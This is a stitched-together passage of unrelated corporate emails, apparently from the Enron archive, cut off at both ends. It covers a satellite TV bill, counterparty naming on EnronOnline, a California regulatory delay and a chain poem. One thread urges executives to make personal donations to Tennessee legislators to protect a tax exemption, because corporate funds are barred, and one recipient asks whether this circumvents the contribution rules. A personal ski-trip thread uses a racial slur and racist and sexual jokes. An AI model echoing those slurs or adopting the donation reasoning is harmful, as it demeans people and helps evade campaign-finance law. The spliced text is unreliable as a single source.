year out to work for Caminus UK, where I am working on introducing and developing a markets-based approach (spark-spread) to real asset valuations in the UK power industry. Thanks in advancve Bernard Murphy
FYI ----- Forwarded by Scott Bolton/Enron Communications on 11/22/99 08:19 AM ----- Jeffrey Keeler@ENRON 11/19/99 10:57 AM To: Scott Bolton/Enron Communications@Enron Communications cc: Cynthia Sandherr/Corp/Enron@ENRON, Joe Hillings/Corp/Enron@ENRON, Chris Long/Corp/Enron@ENRON, Steven J Kean/HOU/EES@EES, Richard Shapiro/HOU/EES@EES Subject: Internet Language DROPPED from Satellite TV bill Scott: Just to follow up on my e-mail and voice mail messaged to you: language that would have barred internet companies from obtaining the licenses to transmit movies, sporting events and other broadcast programs was DROPPED from H.R. 1554, the satellite TV bill (which is attached to H.R. 3194, the omnibus appropriations legislation). Please see the CQ article below for more information on the legislation in general. We will certainly continue to watch for language like this that might surface in future legislation. In the context of ECI's larger legislative agenda, we may also want to explore the potential to develop legislation that would pro-actively ensure the broadcast of licensed programming over the internet. Cheers, Jeff ********* TELECOMMUNICATIONS: SATELLITE BILL SURVIVES A SCARE, CARRIES OTHER MEASURES WITH IT By Alan K. Ota, CQ Staff Writer Nov. 18, 1999 - The uproar in the Senate Thursday over deletion of a loan guarantee program designed to improve rural television service nearly obscured the significance of the satellite television bill that was linked to the fiscal 2000 omnibus spending bill (HR3194). The controversial provision would have created a new Agriculture Department program to guarantee $1.25 billion in loans enabling satellite providers to transmit local programming to rural subscribers -- service they insist is too expensive to provide without help. It was added to the satellite TV bill (HR1554) in conference but dropped when the final version (S1948) was referenced in HR3194. Rural-state senators led by Max Baucus, R-Mont., blocked action on a stopgap funding bill (HJRES82) until leaders promised them a floor vote on the loan guarantee legislation or similar provisions by next April 1. Also dropped from the final bill was language that would haved barred Internet service providers from obtaining the licenses necessary to transmit movies, sports events and other broadcast programming. Cable and satellite providers would be the only entities with such licenses. America Online and other companies lobbied furiously to strip the provision. The final measure would for the first time allow satellite companies to beam local news, sports, weather and other broadcast programming to all of their customers, just as cable providers do. And it would grant a reprieve to more than a million satellite subscribers now receiving local channels who otherwise would lose those signals by year's end. A court had ruled the subscribers do not qualify to receive local signals by satellite under current law. Satellite companies would have to gain permission from local broadcast stations within six months after they begin retransmitting those signals. By Jan. 1, 2002, satellite carriers that transmit local channels would have to carry all of the channels in that community, a "must-carry" requirement already imposed on cable providers. The measure would extend for five years the licenses under which satellite companies retransmit the signals of superstations and distant network stations and reduce the copyright fees they must pay. The bill would generally retain existing standards for determining which subscribers are eligible to receive distant network signals by satellite, but it would require the Federal Communications Commission to review its model for determining which areas are unable to receive acceptable-quality broadcast signals over the air. Like the conference report on HR1554, the final satellite bill carries a number of pieces of unrelated legislation. * Patent Overhaul. In a victory for Senate Judiciary Committee Chairman Orrin G. Hatch, R-Utah, negotiators included a patent system overhaul bill (HR1907) that was strongly opposed by some inventors and by the Eagle Forum, a conservative group headed by political activist Phyllis Schlafly, who argued that it would permit foreign companies to steal American technology. The bill would require publication of some patent applications, which have been filed both in the United States and abroad, within 18 months of filing, whether or not patents have been granted. The measure also would require the Patent and Trademark Office to approve or reject a patent application within three years. It would provide patent term extensions for any not approved within that three-year period to guarantee investors a 17-year patent term. Currently, patents are for 20 years, but inventors often lose years waiting for approval of their applications. * Low-Power TV Stations. The omnibus spending bill also included provisions of a bill (HR486) to create a new "Class A" license for low-power television stations equivalent to those granted to full-service "primary" stations. The provisions are designed to help low-power stations that often provide "niche" programming in urban areas and local programming in rural areas become more stable and commercially viable. * 'Cybersquatting.' The measure includes provisions of a bill (S1255) to bar unauthorized use of trademark-protected brand names in Internet addresses. The bill was passed by the Senate by voice vote Aug. 5; the House passed a different version Oct. 26. * PBS Donor Lists. In response to disclosures earlier this year that some public broadcast stations had exchanged donor lists with political parties -- and primarily with Democratic Party units -- negotiators included a provision to prohibit such stations from sharing their donor lists with political parties. It also would bar disclosure of its donors to any non-affiliated group without the donor's consent. Rep. Cliff Stearns, R-Fla., had introduced legislation (HR2791) earlier this year to prohibit the list-sharing, but the bill did not advance.
Guys, it will be very difficult to get money out of the power group - is the expectation that I come up with the dollars - just curious. Are we not circumventing the spirit of the political contribution rules? Regards Delainey ---------------------- Forwarded by David W Delainey/HOU/ECT on 10/06/2000 08:24 AM --------------------------- Barbara A Hueter@EES 09/29/2000 02:32 PM To: [email protected] cc: Subject: Support for key TN lawmakers ---------------------- Forwarded by Barbara A Hueter/DUB/EES on 09/29/2000 03:32 PM --------------------------- Barbara A Hueter 09/29/2000 03:27 PM To: Dave Delainey, John J Lavorato/Corp/Enron cc: Subject: Support for key TN lawmakers ---------------------- Forwarded by Barbara A Hueter/DUB/EES on 09/29/2000 03:27 PM --------------------------- Barbara A Hueter 09/29/2000 03:24 PM To: Dave Delaney, John Lavorado, Mitch Robinson/Corp/Enron, Ben Jacoby/HOU/ECT cc: Richard Shapiro/HOU/EES@EES Subject: Support for key TN lawmakers Gentelmen, Following is an email detailing requests for personal contributions to legislators who have been instrumental to Enron regarding our power plants in Tennessee. I produced this list based on recommendations from our lobbying firm, Stokes Bartholomew, in Nashville. In 1999, Stokes Bartholomew, working with Jordan Mintz in Enron's tax department, convinced the state legislature to pass legislation clarifying that Enron's power plants would be exempt from the gross receipts tax. Had we not succeeded in the effort, we would have had to pay gross receipts taxes of approximately $1.5 million per year. In 2000, Tennessee is one of the only states in the union that has been running a deficit in the general revenue fund. Rather than going home for the summer, the legislature stayed in session and debated among themselves and with the Governor on how to solve the revenue shortfall issue. Eventually, they adopted unreasonably optimistic revenue projections to produce a balanced budget (on paper). This has not solved the problem because the state is already $100 million below revenue projections in the first quarter of the fiscal year. The legislature will look for a long term solution when it returns in January. Stokes Bartholomew informs me that all sources of revenue will be considered - this means our exemption from the gross receipts tax could possibly be repealed. At this time, no one is singling this exemption out, but Stokes Bartholomew is cautious and is monitoring the issue closely. Numerous legislators supported the gross receipts legislation for Enron. If our gross receipts tax exemption is threatened next legislative session, we would have to return to these same legislators (if they are reelected) for support. As long as Enron pays taxes in Tennessee, it behooves us to take an active interest in supporting those legislators who will defend our interests in the capitol. Since you are the key contacts at Enron for Tennessee, I ask you to assess this matter and decide whether ongoing legislative support is important to Enron's interests in TN and make contributions accordingly. I have recommended $9,500 in contributions. While this seems like a large amount, it is miniscule in comparison to the taxes we are not paying. Moreover, it will go a long way to helping us protect our interests against those who would fight to have "big corporations", particularly out-of-state corporations, get stuck with additional tax burdens to solve the state's fiscal woes. You are probably asking why we are not using Enron PAC funds or coroporate funds to make these donations. Tennessee law prohibits us from using corporate funds and limits the use of PAC funds to those PACs that do not receive any source of support from the corporation. Because Enron Corp. pays the expenses for the Enron PAC, we are not permitted to contribute Enron PAC funds to candidates in Tennessee. This is one of the most onerous political contribution laws in the country. If you have any questions I can be reached for the next week at 614.306.4359. Or you can leave a message for me at 614.760.7472. ---------------------- Forwarded by Barbara A Hueter/DUB/EES on 09/29/2000 12:56 PM --------------------------- Barbara A Hueter 09/14/2000 03:28 PM To: Ben Jacoby cc: Rick Shapiro, Janine Migden/DUB/EES@EES Subject: Support for key TN lawmakers Per our phone conversation, following is a list of key legislative leaders deserving of Enron's support. This list has been developed by our counsel/legislative agents in Nashville: Bill Bruce, Gif Thornton and Robert Gowan. Please feel free to call me to discuss further. You can reach me on my cell phone this afternoon and all day tomorrow. I will be in the office on Monday. Lieutenant Governor: Senator John Wilder (Democrat) $2,500 Represents Brownsville in the Senate. Sponsor of 1999 gross receipts tax exemption legislation for Brownsville. Has a serious opponent this November. The Senate elects the Lieutenant Governor who also serves as the head of the Senate. It is in Enron's best interst that John Wilder win the election and be re-elected Lieutenant Governor. Rep. Jimmy Naifey $1,000 Speaker of the House Represents Brownsvile. Senate Candidate Larry Trail (Democrat) $2,000 John Wilder's personal mission, besides his own election, is to get Larry elected to the Senate (it is an open seat that is being vacated by a Democrat). If the Democrats lose this seat there is a very good chance that Senator Wilder will not be re-elected Lieutenant Governor because the Democrats will have lost the majority in the Senate. Rep. Matt Kisber (Democrat) $1,500 Represents the Jackson area. Very pro-business Democrat. Is in a very tough race because the district was redrawn and it now majority Republican. Matt is the chair of the House Finance, Ways and Means Committee - which hears all gross receipts tax matters. Was very helpful to Enron on the gross receipts legislation. Senator Jerry Cooper $1,000 Chair of the Senate Commerce Committee His committee hears all legislation relating to energy and power plants. Rep. Shelby Rinehart $500 Chair of Commerce Committe (all energy and power plant issues) and powerful member of the House Finance and Ways and Means Committee. He is extremely powerful. Bill, Gif and Robert have a very good relationship and rely on him for assistance for their clients regularly. Unless otherwise noted, checks should be make payable to "Friends of _______________". Please forward to Bill Bruce fo personal delivery. (or if you want to get them to me I can pass them along) Bill Bruce Stokes, Bartholomew, Evans and Petree P.A. Sun Trust Financial Center 424 Church Street, Suite 2800 Nashville, TN 37219-2386
Sorry Roby, Let me make myself more clear for you to understand. Yo my nigga, me and my ice are in for da ski ski in da Rocks! Me and my boyz will be in full effect. Fill me in, on when we will be going to "C" to the isa "O" to the iso and let me know how much bling bling I will need. Cuz I got ho's in dat area code! Naquin --- COREY ROBICHEAUX <[email protected]> wrote: > Good call Ross, CjRob wants to know why also?? > > > >From: [email protected] > >To: Scott Naquin <[email protected]> > >CC: Clint Eilbeck <[email protected]>, Myers Namie > <[email protected]>, > >Myers Namie <[email protected]>, Denis Naquin <[email protected]>, > > >Scott Naquin <[email protected]>, Tommy Porteous > <[email protected]>, > >"'COREY ROBICHEAUX'" <[email protected]>, Cypress Baton Rouge > <[email protected]>, > > Tanya Flynn <[email protected]>, Mike Gooch > <[email protected]>, > >Bernard Guste <[email protected]>, Clay Hufft <[email protected]>, > > >Matt Lenhart <[email protected]>, Cypress Litigation > ><[email protected]>, Ross Berthelot <[email protected]>, > > >Ross Berthelot <[email protected]>, Chris Bourgeois > ><[email protected]>, Scott Dehart <[email protected]>, don edgerton > > ><[email protected]> > >Subject: Re: THE OFFICIAL SNOW REPORT!!!!! > >Date: Wed, 24 Oct 2001 09:27:11 -0500 > > > > > >Naq, > > > >why do you refer to yourself in the 3rd person? "Jimmy likes > Elayne...Jimmy > >thinks Elayne is allright....." > > > > > > > > > >Ross F. Berthelot > >Underwriter > >Commercial Real Estate > >Ph: (225) 332-4252 > >Fax: (225) 332-3154 > > > > > > > > > > > > > >Scott Naquin <[email protected]> on 10/24/2001 08:28:28 AM > > > >To: Clint Eilbeck <[email protected]>, Myers Namie > <[email protected]>, > > Myers Namie <[email protected]>, Denis Naquin > ><[email protected]>, > > Scott Naquin <[email protected]>, Tommy Porteous > > <[email protected]>, "'COREY ROBICHEAUX'" <[email protected]>, > > Cypress Baton Rouge <[email protected]>, Tanya Flynn > > <[email protected]>, Mike Gooch <[email protected]>, > Bernard > > Guste <[email protected]>, Clay Hufft <[email protected]>, > Matt > > Lenhart <[email protected]>, Cypress Litigation > > <[email protected]>, Ross Berthelot > <[email protected]>, > > Ross Berthelot <[email protected]>, Chris Bourgeois > > <[email protected]>, Scott Dehart <[email protected]>, don > >edgerton > > <[email protected]> > >cc: > > > >Subject: Re: THE OFFICIAL SNOW REPORT!!!!! > > > > > > > >Naquin is in if that is the actual deal..........Clint, did Malboro > >promise you this deal if you would keep smoking? > >Props on the last email by the way, that shit was good! > > > >Give me the details as to when we need the first wave of cash! > > > >Who is going without dates because I don't want to be stuck roasting > >marsh-mellows and snuggling in front the fireplace! > > > >Naquin > > > > > > > >--- Clint Eilbeck <[email protected]> wrote: > > > This is the Official Snowking Report for the Year > > > 2002! > > > > > > How bout Keystone/Vail/Breckenridge/"Beaver" Creek all > > > in one trip for the Amazing Price of $590.00. Yes, > > > that is correct - No Bullshit. > > > > > > Listen Up- > > > This includes round trip tickets from N.O. to Denver. > > > 5 Days/4 Nights in a Condo in Keystone (Either 2 BR/2 > > > Bath or 3 BR/2 Bath w/ a fold out. Includes minivan, > > > since Keystone is approximately 91 miles from the > > > Denver Airport. Lift tickets for 4 Days at the > > > locations mentioned above (Sorry, only 2 days out of 4 > > > can be at Vail or Beaver Creek.) > > > > > > Dates: Jan. 10 - 14th (Thurs.-Mon.) > > > > > > If you act now, they will also provide free snowjobs. > > > They also said if you ride a Harley Sportster all the > > > way from B.R.,they will just give the trip away. I > > > asked about pets -Dogs have to sleep outside, Sorry. > > > > > > They have plenty of ski runs. One double black diamond > > > goes through the nig part of town, I suggest going w/ > > > cjrob through this treacherous run and don't slow down > > > on the flat areas. Another goes straight to Oz - we > > > all know who will be hitting this green run in his > > > Pink bib and jacket. They also have a married couple > > > run, no further comments on this one. 00. I'll be on > > > the bunny slopes checking out the MILF'S and the > > > beginners. I hope to give a few lessons. > > > > > > Anyway, who has questions or comments? > > > > > > CE > > > Don't forget your swim trunks! > > > > > > > > > __________________________________________________ > > > Do You Yahoo!? > > > Make a great connection at Yahoo! Personals. > > > http://personals.yahoo.com > > > > > >__________________________________________________ > >Do You Yahoo!? > >Make a great connection at Yahoo! Personals. > >http://personals.yahoo.com > > > > > > > > > > > > > >This transmission may contain information that is privileged, > confidential > >and/or exempt from disclosure under applicable law. If you are not the > >intended recipient, you are hereby notified that any disclosure, > copying, > >distribution, or use of the information contained herein (including any > > >reliance thereon) is STRICTLY PROHIBITED. If you received this > transmission > >in error, please immediately contact the sender and destroy the > material in > >its entirety, whether in electronic or hard copy format. Thank you. > > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at > http://explorer.msn.com/intl.asp > __________________________________________________ Do You Yahoo!? Make a great connection at Yahoo! Personals. http://personals.yahoo.com
Another Division Mark, Global Counterparty wants me to approve this EOL counterparty which is a division. My deal with the EOL team was that they would kick these counterparties back and try to get the legal incorporated entity as part of the name. Global Counterparty is satisfied opening counterparties up as divisions and I am getting frustrated constantly fighting this battle. Do you wish to intercede, or shall I give up and let counterparties be opened as divisions? Do you want to call a meeting with Sam's boss to discuss divisions? What to do? ----- Forwarded by Tana Jones/HOU/ECT on 03/28/2001 03:39 PM ----- Samuel Schott 03/28/2001 01:09 PM To: Tana Jones/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT cc: Walter Guidroz/Enron@EnronXGate, Tom Moran/Enron@EnronXGate, Lisa Lees/HOU/ECT@ECT, Marilyn Colbert/HOU/ECT@ECT, Cheryl Johnson/Corp/Enron@Enron Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response - CP/ID 94330, Cargill Ferrous International FYI... Cargill Ferrous International is setup correctly in the Global Counterparty System as a Division of Cargill, Inc. Cargill Ferrous International is the full name of this division and setup as such in GCP with a Sub-to-Legal Link to Cargill, Inc. per GCP procedure. Also, the Global SAP team (Cheryl Johnson) would need Legal Name Change documentation from the Counterparty in order to change this name. Best Rgds. Samuel x3-9890 (GCP) Enron Net Works _ Global Data Management From: Tana Jones on 03/28/2001 09:47 AM To: Samuel Schott/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT cc: Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response Any updates on adding the correct legal name to this counterparty name? ---------------------- Forwarded by Samuel Schott/HOU/ECT on 03/28/2001 12:53 PM --------------------------- From: Samuel Schott 03/23/2001 11:25 AM To: Stephanie Sever/HOU/ECT@ECT cc: Tana Jones/HOU/ECT@ECT, Walter Guidroz/NA/Enron, Tom Moran/Enron@EnronXGate, Lisa Lees/HOU/ECT@ECT, Marilyn Colbert/HOU/ECT@ECT Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response Hello, Yes, GCP provides the links to establish the correlation between the parent and child for our downstream systems. GCP procedure is to create Counterparty names that reflect either the Tradename / Division name or Parent Name - - not both simultaneously. (Although, we have broken that rule for Legal in the past.) This defeats the purpose of using a Tradename. Best Rgds. Samuel From: Stephanie Sever 03/23/2001 10:21 AM To: Tana Jones/HOU/ECT@ECT cc: Samuel Schott/HOU/ECT@ECT, Walter Guidroz/NA/Enron, Tom Moran/Enron@EnronXGate, Lisa Lees/HOU/ECT@ECT Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response Tana, Please review the process below: With divisions, EOL does request a new Password Application for the applicant reflecting the name as you noted below. When the company is set up in the EOL database we link the company to the Parent and reference the CP ID. Sam, please confirm, Global Counterparty also provides the links to establish correlation between the parent and child for our downstream systems. Let me know if this is the appropriate steps that you would like to see. Thanks, Stephanie From: Tana Jones on 03/22/2001 06:03 PM To: Samuel Schott/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT cc: Walter Guidroz/Enron@EnronXGate, Tom Moran/Enron@EnronXGate Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response Sam & Stephanie, Re: Cargill Ferrous International It was my understanding with the EOL Team that all divisions would have the legal incorporated entity as part of the name. Stephanie, I my preference is to kick their Password Application back and get them to change it to read something like "Cargill Ferrous International, a division of Cargill, Inc." or "Cargill, Inc. acting through its Cargill Ferrous International Division". Samuel Schott 03/21/2001 01:58 PM To: Walter Guidroz/ENRON@enronXgate @ ENRON, Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate@ENRON, Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/ENRON@enronXgate@ENRON, Cynthia Clark/ENRON@enronXgate@ENRON, Enron Europe Global Contracts and Facilities@ENRON, Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom Moran/ENRON@enronXgate@ENRON, Claudia Clark/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate@ENRON, Lisa Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate@ENRON, Kelly Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron Communications@ENRON, EOL Call Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications@ENRON, Molly LaFuze/Enron Communications@Enron Communications@ENRON, Danny Clark/Enron Communications@Enron Communications@ENRON cc: Subject: Re: EOL approvals, 3-20-01 _ GCP (US) Response Any GCP adjustments will be highlighted in red. Attn. GCP_London: There's a new EOL Counterparty listed in the UK. Please respond. Best Rgds. Samuel x3-9890 ENW_GCP From: Walter Guidroz/ENRON@enronXgate on 03/20/2001 05:30 PM To: Karen Lambert/HOU/ECT@ECT, Tana Jones/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Brant Reves/ENRON@enronXgate, Debbie R Brackett/HOU/ECT@ECT, David Hardy/LON/ECT@ECT, Lesli Campbell/ENRON@enronXgate, Cynthia Clark/ENRON@enronXgate, Enron Europe Global Contracts and Facilities@ENRON, Enron Europe Global CounterParty/LON/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tom Moran/ENRON@enronXgate, Claudia Clark/HOU/ECT@ECT, William S Bradford/ENRON@enronXgate, Lisa Lees/HOU/ECT@ECT, Juana Fayett/Corp/Enron@Enron, Jana Morse/Corp/Enron@Enron, Trang Le/HOU/ECT@ECT, Paul Maley/LON/ECT@ECT, Sonya Clarke/LON/ECT@ECT, Tim Davies/LON/ECT@ECT, Karen O'Day/NA/Enron@Enron, Tanya Rohauer/ENRON@enronXgate, Kelly Lombardi/NA/Enron@Enron, Brian Lindsay/Enron Communications@Enron Communications, EOL Call Center@ENRON, Bernice Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Amy Heffernan/Enron Communications@Enron Communications, Molly LaFuze/Enron Communications@Enron Communications, Danny Clark/Enron Communications@Enron Communications cc: Subject: EOL approvals, 3-20-01 Please see attached.
Sue Mara Enron Corp. Tel: (415) 782-7802 Fax:(415) 782-7854 ----- Forwarded by Susan J Mara/NA/Enron on 07/05/2001 10:15 AM ----- Gary L Sova@EES 07/05/2001 06:52 AM To: Susan J Mara/NA/Enron@ENRON cc: Angela Schwarz/HOU/EES@EES Subject: CPUC Postpones action on Direct Access Until Mid-August Susan, would you please add me to your mailing list for follow up on the CA direct access updates. I report to Angela Schwarz and responsible for client origination/restructure in her group. Thanks,Gary.---------------------- Forwarded by Gary L Sova/HOU/EES on 07/05/2001 08:49 AM --------------------------- Enron Energy Services From: Justin Day 07/05/2001 08:38 AM Phone No: 713-345-8205 cell: 713 444 9139 pgr: 877 254 5184 To: Gary L Sova/HOU/EES@EES cc: Subject: CPUC Postpones action on Direct Access Until Mid-August Hope this helps. ---------------------- Forwarded by Justin Day/HOU/EES on 07/05/2001 08:38 AM --------------------------- Scott Porter 07/03/2001 01:54 PM To: [email protected], [email protected], [email protected] cc: Edwin Essandoh/HOU/EES@EES, Jeff Gale/HOU/EES@EES, Justin Day/HOU/EES@EES Subject: CPUC Postpones action on Direct Access Until Mid-August Everyone: Please see the attached press release from the California Public Utilities Commission that was released today. The Commission has postponed for a second time its vote, this time until mid-August. I have not heard what is behind this but thought you should know ASAP. Scott ---------------------- Forwarded by Scott Porter/HOU/EES on 07/03/2001 01:52 PM --------------------------- Jodi Thrasher 07/03/2001 01:46 PM To: Tom Prisk/HOU/EES@EES, Scott Porter/HOU/EES@EES cc: Subject: CPUC Postpones action on Direct Access Until Mid-August ---------------------- Forwarded by Jodi Thrasher/HOU/EES on 07/03/2001 01:46 PM --------------------------- Enron Energy Services From: Jennifer Rudolph 07/03/2001 01:09 PM To: CA Team cc: Subject: CPUC Postpones action on Direct Access Until Mid-August ---------------------- Forwarded by Jennifer Rudolph/HOU/EES on 07/03/2001 01:09 PM --------------------------- Susan J Mara@ENRON 07/03/2001 12:35 PM To: Alan Comnes/PDX/ECT@ECT, Angela Schwarz/HOU/EES@EES, Beverly Aden/HOU/EES@EES, Brenda Barreda/HOU/EES@EES, Carol Moffett/HOU/EES@EES, Cathy Corbin/HOU/EES@EES, Chris H Foster/HOU/ECT@ECT, Christina Liscano/HOU/EES@EES, Christopher F Calger/PDX/ECT@ECT, Craig H Sutter/HOU/EES@EES, Dan Leff/HOU/EES@EES, Debora Whitehead/HOU/EES@EES, Dennis Benevides/HOU/EES@EES, Don Black/HOU/EES@EES, Douglas Huth/HOU/EES@EES, Edward Sacks/Corp/Enron@ENRON, Eric Melvin/HOU/EES@EES, Erika Dupre/HOU/EES@EES, Evan Hughes/HOU/EES@EES, Fran Deltoro/HOU/EES@EES, Gayle W Muench/HOU/EES@EES, Ginger Dernehl/NA/Enron@ENRON, Gordon Savage/HOU/EES@EES, Harold G Buchanan/HOU/EES@EES, Harry Kingerski/NA/Enron@ENRON, James D Steffes/NA/Enron@ENRON, James W Lewis/HOU/EES@EES, James Wright/Western Region/The Bentley Company@Exchange, Jeff Messina/HOU/EES@EES, Jeremy Blachman/HOU/EES@EES, Jess Hewitt/HOU/EES@EES, Joe Hartsoe/Corp/Enron@ENRON, Karen Denne/Corp/Enron@ENRON, Kathy Bass/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Ken Gustafson/HOU/EES@EES, Kevin Hughes/HOU/EES@EES, Leasa Lopez/HOU/EES@EES, Leticia Botello/HOU/EES@EES, Mark S Muller/HOU/EES@EES, Marsha Suggs/HOU/EES@EES, Marty Sunde/HOU/EES@EES, Meredith M Eggleston/HOU/EES@EES, Michael Etringer/HOU/ECT@ECT, Michael Mann/HOU/EES@EES, Michelle D Cisneros/HOU/ECT@ECT, [email protected], Neil Bresnan/HOU/EES@EES, Neil Hong/HOU/EES@EES, Paul Kaufman/PDX/ECT@ECT, Richard L Zdunkewicz/HOU/EES@EES, Richard Leibert/HOU/EES@EES, Richard Shapiro/NA/Enron@ENRON, Rita Hennessy/NA/Enron@ENRON, Robert Badeer/HOU/ECT@ECT, Rosalinda Tijerina/HOU/EES@EES, Sarah Novosel/Corp/Enron@ENRON, Scott Gahn/HOU/EES@EES, Scott Stoness/HOU/EES@EES, Sharon Dick/HOU/EES@EES, [email protected], Susan J Mara/NA/Enron@ENRON, Tanya Leslie/HOU/EES@EES, Tasha Lair/HOU/EES@EES, Ted Murphy/HOU/ECT@ECT, Terri Greenlee/NA/Enron@ENRON, Tim Belden/HOU/ECT@ECT, Tony Spruiell/HOU/EES@EES, Vicki Sharp/HOU/EES@EES, Vladimir Gorny/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, William S Bradford/HOU/ECT@ECT, Jubran Whalan/HOU/EES@EES, Richard B Sanders/HOU/ECT@ECT, Robert C Williams/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, [email protected], [email protected], Donna Fulton/Corp/Enron@ENRON, [email protected], Bruno Gaillard/EU/Enron@Enron, Linda Robertson/NA/Enron@ENRON, Ren, Lazure/Western Region/The Bentley Company@Exchange, Michael Tribolet/Corp/Enron@Enron, Phillip K Allen/HOU/ECT@ECT, Christian Yoder/HOU/ECT@ECT, [email protected], Tamara Johnson/HOU/EES@EES, Greg Wolfe/HOU/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, Dirk vanUlden/Western Region/The Bentley Company@Exchange, Steve Walker/SFO/EES@EES, James Wright/Western Region/The Bentley Company@Exchange, Mike D Smith/HOU/EES@EES, Richard Shapiro/NA/Enron@Enron, Leslie Lawner/NA/Enron@Enron, Robert Neustaedter/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steve Walton/HOU/ECT@ECT, [email protected], [email protected], Janel Guerrero/Corp/Enron@Enron, Mark Fillinger/SF/ECT@ECT, Jennifer Rudolph/HOU/EES@EES, Martin Wenzel/SFO/HOU/EES@EES, [email protected], Joseph Alamo/NA/Enron@Enron, Ray Alvarez/NA/Enron@ENRON, David Leboe/Enron@EnronXGate, Jay Zoellner/Western Region/The Bentley Company@Exchange, Fatimata Liamidi/HOU/EES@EES, Sonia Perez/HOU/EES@EES, Chris Holmes/HOU/EES@EES, Venkatesh Mani/Western Region/The Bentley Company@Exchange, Richard Crevelt/Western Region/The Bentley Company@Exchange, Dave Perrino/SF/ECT@ECT, Malcolm Adkins/HOU/EES@EES, Kevin Keeney/HOU/EES@EES, Chris Stokley/ENRON@enronXgate, Steve C Hall/ENRON@enronXgate, Tracy Ngo/Enron@EnronXGate, [email protected] cc: Subject: CPUC Postpones action on Direct Access Until Mid-August The vote to suspend direct access has been postponed. This is a positive sign that the legislature is making progress on a comprehensive solution. Sue Mara Enron Corp. Tel: (415) 782-7802 Fax:(415) 782-7854 ----- Forwarded by Susan J Mara/NA/Enron on 07/03/2001 10:28 AM ----- "Bill Chen" <[email protected]> 07/03/2001 09:57 AM To: [email protected] cc: [email protected], [email protected], [email protected], [email protected] Subject: Today's CPUC Mtg. - Cancelled See attached press release. Bill - 070301.doc
that was cute!? thank you! i especially loved the list.... At 08:28 AM 12/12/2000 -0600, you wrote: ---------------------- Forwarded by Susan M Scott/HOU/ECT on 12/12/2000 08:23 AM --------------------------- ????????????????????????????????????????????????????? ?(Embedded???? Enron Capital & Trade Resources Corp.? ?image moved????????????????????????????????????????? ?to file:???? From:? "Emily Hillegeist"????????????? ?pic24766.pcx) <[email protected]>????????????? ?????????????? 12/12/2000 03:40 AM??????????????????? ????????????????????????????????????????????????????? ????????????????????????????????????????????????????? ????????????????????????????????????????????????????? To:?? [email protected], [email protected], [email protected] cc: Subject:? Fwd: hey, girlfriends! >From: [email protected] >To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] >Subject: Fwd: hey, girlfriends! >Date: Tue, 12 Dec 2000 04:30:16 EST > > Get more from the Web.? FREE MSN Explorer download : http://explorer.msn.com Content-Transfer-Encoding: 7bit Return-Path: <[email protected]> Received: from? rly-ye04.mx.aol.com (rly-ye04.mail.aol.com []) by air-ye04.mail.aol.com (v77.14) with ESMTP; Tue, 12 Dec 2000 02:34:21 -0500 Received: from? secure.smtp.email.msn.com (cpimssmtpu07.email.msn.com []) by rly-ye04.mx.aol.com (v77.27) with ESMTP; Tue, 12 Dec 2000 02:34:14 -0500 Received: from oemcomputer - by email.msn.com with Microsoft SMTPSVC;?? Mon, 11 Dec 2000 23:33:56 -0800 Message-ID: <000801c0640d$da9f4f80$2389073e@oemcomputer> From: "thesymingtons" <[email protected]> To: "Maggie Symington" <[email protected]> Subject: hey, girlfriends! Date: Mon, 11 Dec 2000 17:15:45 -0000 MIME-Version: 1.0 Content-Type: text/plain;???? charset="iso-8859-1" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Something fun to read! > >? I WANT WHAT SHE'S HAVING > > >>>> I have a new delightful friend, > > >? > I am most in awe of her. > > >? > When we first met I was impressed, > > >? > By her bizarre behavior. > > >? > > > >? > That day I had a date with friends, > > >? > We met to have some lunch. > > >? > Mae had come along with them, > > >? > All in all ... a pleasant bunch. > > >? > > > >? > When the menus were presented, > > >? > We ordered salads, sandwiches, and soups. > > >? > Except for Mae who circumvented, > > >? > And said, Ice Cream, please: two scoops. > > >? > > > >? > I was not sure my ears heard right, > > >? > And the others were aghast. > > >? > Along with heated apple pie, > > >? > Mae added, completely unabashed. > > >? > > > >? > We tried to act quite nonchalant, > > >? > As if people did this all the time. > > >? > But when our orders were brought out, > > >? > I did not enjoy mine. > > >? > > > >? > I could not take my eyes off Mae, > > >? > As her pie a-la-mode went down. > > >? > The other ladies showed dismay, > > >? > They ate their lunches silently, and frowned. > > >? > > > >? > Well, the next time I went out to eat, > > >? > I called and invited Mae. > > >? > My 